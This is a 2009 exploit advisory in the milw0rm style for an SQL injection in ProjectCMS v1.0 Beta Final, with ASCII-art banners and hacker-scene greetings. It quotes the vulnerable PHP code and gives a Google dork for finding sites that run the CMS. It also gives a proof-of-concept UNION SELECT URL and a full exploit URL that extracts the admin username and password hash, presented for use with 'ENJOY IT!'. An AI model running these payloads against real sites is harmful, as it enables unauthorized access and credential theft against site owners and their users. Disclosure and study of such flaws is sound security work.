*********************************************************************************************** *********************************************************************************************** ** ** ** ** ** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** ** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** ** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** ** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ **==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- ** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** ** ** ** ** ** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** ** ¡PROUD TO BE SPANISH! ** ** ** *********************************************************************************************** *********************************************************************************************** ---------------------------------------------------------------------------------------------- | SQL INJECTION (SQLi) VULNERABILITY | |--------------------------------------------------------------------------------------------| | | ProjectCMS v1.0 Beta Final | | | CMS INFORMATION: ------------------------------ | | | |-->WEB: http://projectcms.org/ | |-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip | |-->DEMO: http://projectcms.org | |-->CATEGORY: CMS / Portal | |-->DESCRIPTION: ProjectCMS is an open source community project to create | | a simple content management system with an easy to follow install... | |-->RELEASED: 2009-04-29 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: "Powered by ProjectCMS" | |-->CATEGORY: SQL INJECTION VULNERABILITY | |-->AFFECT VERSION: 1.0 Beta Final (maybe <= ?) | |-->Discovered Bug date: 2009-04-29 | |-->Reported Bug date: 2009-04-29 | |-->Fixed bug date: N/A | |-->Info patch: N/A | |-->Author: YEnH4ckEr | |-->mail: y3nh4ck3r[at]gmail[dot]com | |-->WEB/BLOG: N/A | |-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | |-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ---------------------------------------------------------------------------------------------- ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>> ----------- VULN FILE: ----------- ... $sn=$_GET["sn"]; if ( $sn == "" ) { $sn = "1"; } $sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'"; $result=mysql_query($sql,$connection) or die(mysql_error()); ... ------------------ PROOF OF CONCEPT: ------------------ http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/* Return --> user and database, this last in title ;) ---------- EXPLOIT: ---------- http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/* Return --> username:::password (md5 hash) of admin and database (in title too). <<<-----------------------------EOF---------------------------------->>>ENJOY IT! ####################################################################### ####################################################################### ##*******************************************************************## ## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: JosS and all SPANISH Hack3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################